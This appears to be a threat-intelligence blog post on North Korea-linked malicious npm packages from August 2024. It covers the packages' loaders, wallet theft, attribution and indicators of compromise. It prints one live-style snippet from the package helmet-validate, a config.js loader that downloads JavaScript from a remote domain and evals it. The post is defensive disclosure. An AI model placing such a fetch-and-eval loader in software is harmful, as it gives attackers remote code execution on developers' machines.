North Korea Still Attacking Developers via npm

In the past few weeks, we've observed a renewed surge of activity from groups aligned with North Korean objectives, publishing several packages to npm. This latest wave appears to involve multiple groups or at least exhibits several distinct publication patterns, TTPs (Tactics, Techniques, and Procedures), and attack types we've seen in the past. The renewed surge began on August 12, 2024, with the publication of temp-etherscan-api and two versions of ethersscan-api. Approximately a week and a half later, telegram-con and another version of ethersscan-api were published. These packages appear to contain similar malware, including qq-console, published two weeks later on August 27. Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as "Contagious Interview".

These attacks are characterized by multi-stage obfuscated JavaScript that downloads additional malware components from remote servers. These include Python scripts and even a full Python interpreter, which then systematically searches for and attempts to exfiltrate sensitive data from cryptocurrency wallet browser extensions while establishing persistence on the victim's machine. We've written about this form of malware twice before, first in February 2024 and again in June 2024, detailing its evolution and impact on the developer community.

On August 23, published just minutes after the most recent version of ethersscan-api and telegram-con, we saw helmet-validate published. This package takes a different approach, simply inserting the following code into a file called config.js:

const axios = require("axios")

async function runCode() {
    const res = await axios.get("<http://ipcheck>[.]cloud/api/user/thirdcookie/v3/197");
    eval(res.data.cookie);
}

runCode();

This code directly evals JavaScript returned from an endpoint located at the ipcheck[.]cloud domain. Our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) that mirotalk[.]net resolved to when it was online. The mirotalk domain was previously used in fake job campaigns attributed to North Korean threat actors, suggesting a potential link between these attacks.

Finally, on August 27, we also identified the publication of sass-notification; behaviors in this campaign lead us believe that this package is attributable to “Moonstone Sleet”. The attack vector used by this package is also familiar, and we've written about it previously, first in November 2023 and more recently in July 2024. These attacks are characterized by using obfuscated JavaScript to write and execute batch and PowerShell scripts. The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.

The diversity and simultaneous deployment of these attack vectors reveal a coordinated and relentless campaign by North Korean-aligned threat actors. These adversaries continuously exploit the inherent trust in the npm ecosystem to compromise developers, infiltrate companies, and steal cryptocurrency or any other assets that could lead to illicit financial gains.

Publication Timeline

IOCs

• ipcheck[.]cloud
• 45[.]61[.]158[.]14
• 167[.]88[.]36[.]13
• 95[.]164[.]17[.]24